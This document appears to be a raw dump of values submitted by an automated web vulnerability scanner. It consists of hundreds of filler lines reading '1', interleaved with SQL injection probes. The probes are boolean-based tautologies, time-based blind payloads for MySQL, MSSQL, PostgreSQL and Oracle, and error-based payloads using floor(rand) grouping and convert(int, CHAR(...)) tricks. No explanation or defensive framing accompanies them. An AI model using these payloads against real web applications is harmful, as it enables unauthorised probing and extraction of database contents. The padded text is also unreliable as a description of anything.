1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1WwdhupH4
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
-1 OR 2+282-282-1=0+0+0+1 --
1
1
1
1
1
1
1
1
-1 OR 2+187-187-1=0+0+0+1
1
1
1
1
1
1
1
1
-1 OR 3+187-187-1=0+0+0+1
1
1
1
1
1
1
1
1
-1 OR 3*2<(0+5+187-187)
1
1
1
1
1
1
1
1
-1 OR 3*2>(0+5+187-187)
1
1
1
1
1
1
1
1
-1 OR 2+1-1-1=1 AND 187=187
1
1
1
1
1
1
1
1
-1 OR 2+1-1+1=1 AND 187=187
1
1
1
1
1
1
1
1
-1 OR 3*2=5 AND 187=187
1
1
1
1
1
1
1
1
-1 OR 3*2=6 AND 187=187
1
1
1
1
1
1
1
1
-1' OR 2+91-91-1=0+0+0+1 --
1
1
1
1
1
1
1
1
-1' OR 3+91-91-1=0+0+0+1 --
1
1
1
1
1
1
1
1
-1' OR 3*2<(0+5+91-91) --
1
1
1
1
1
1
1
1
-1' OR 3*2>(0+5+91-91) --
1
1
1
1
1
1
1
1
-1' OR 2+494-494-1=0+0+0+1 or 'ZSIxCLDu'='
1
1
1
1
1
1
1
1
-1' OR 3+494-494-1=0+0+0+1 or 'ZSIxCLDu'='
1
1
1
1
1
1
1
1
-1' OR 3*2<(0+5+494-494) or 'ZSIxCLDu'='
1
1
1
1
1
1
1
1
-1' OR 3*2>(0+5+494-494) or 'ZSIxCLDu'='
1
1
1
1
1
1
1
1
-1" OR 2+77-77-1=0+0+0+1 --
1
1
1
1
1
1
1
1
1*if(now()=sysdate(),sleep(15),0)
1
1
1
1
1
1
1
1
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
1
1
1
1
1
1
1
1
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
1
1
1
1
1
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1
1
1
1
1
1
1
1-1; waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1-1); waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1-1 waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1dJhvBH8Q'; waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1-1 OR 122=(SELECT 122 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1-1) OR 702=(SELECT 702 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1-1)) OR 321=(SELECT 321 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1iEfMtRYY' OR 346=(SELECT 346 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1vwJ8VGck') OR 585=(SELECT 585 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
183eTuYYZ')) OR 312=(SELECT 312 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1
1
1
1
1
1
1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"
1
1
1
1
1
1
1
1
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(110),CHAR(120),CHAR(83),CHAR(55),CHAR(87),CHAR(115),CHAR(122)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and
1
1
1
1
1
1
1
1
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(110),CHAR(120),CHAR(83),CHAR(55),CHAR(87),CHAR(115),CHAR(122)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
1
1
1
1
1
1
1
1
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(110)+CHAR(120)+CHAR(83)+CHAR(55)+CHAR(87)+CHAR(115)+CHAR(122)) FROM syscolumns)
1
1
1
1
1
1
1
1
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(110)+CHAR(120)+CHAR(83)+CHAR(55)+CHAR(87)+CHAR(115)+CHAR(122))
1
1
1
1
1
1
1
1
'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(108),CHAR(56),CHAR(104),CHAR(100),CHAR(98),CHAR(104),CHAR(108),CHAR(109)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
1
1
1
1
1
1
1
1
'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(108),CHAR(56),CHAR(104),CHAR(100),CHAR(98),CHAR(104),CHAR(108),CHAR(109)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'
1
1
1
1
1
1
1
1
'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(108)+CHAR(56)+CHAR(104)+CHAR(100)+CHAR(98)+CHAR(104)+CHAR(108)+CHAR(109)) FROM syscolumns)+'
1
1
1
1
1
1
1
1
'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(108)+CHAR(56)+CHAR(104)+CHAR(100)+CHAR(98)+CHAR(104)+CHAR(108)+CHAR(109))+'
1
1
1
1
1
1
1
1
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(54),CHAR(104),CHAR(122),CHAR(109),CHAR(77),CHAR(81),CHAR(100),CHAR(101)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
1
1
1
1
1
1
1
1
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(54),CHAR(104),CHAR(122),CHAR(109),CHAR(77),CHAR(81),CHAR(100),CHAR(101)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"
1
1
1
1
1
1
1
1
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(54)+CHAR(104)+CHAR(122)+CHAR(109)+CHAR(77)+CHAR(81)+CHAR(100)+CHAR(101)) FROM syscolumns)+"
1
1
1
1
1
1
1
1
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(54)+CHAR(104)+CHAR(122)+CHAR(109)+CHAR(77)+CHAR(81)+CHAR(100)+CHAR(101))+"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1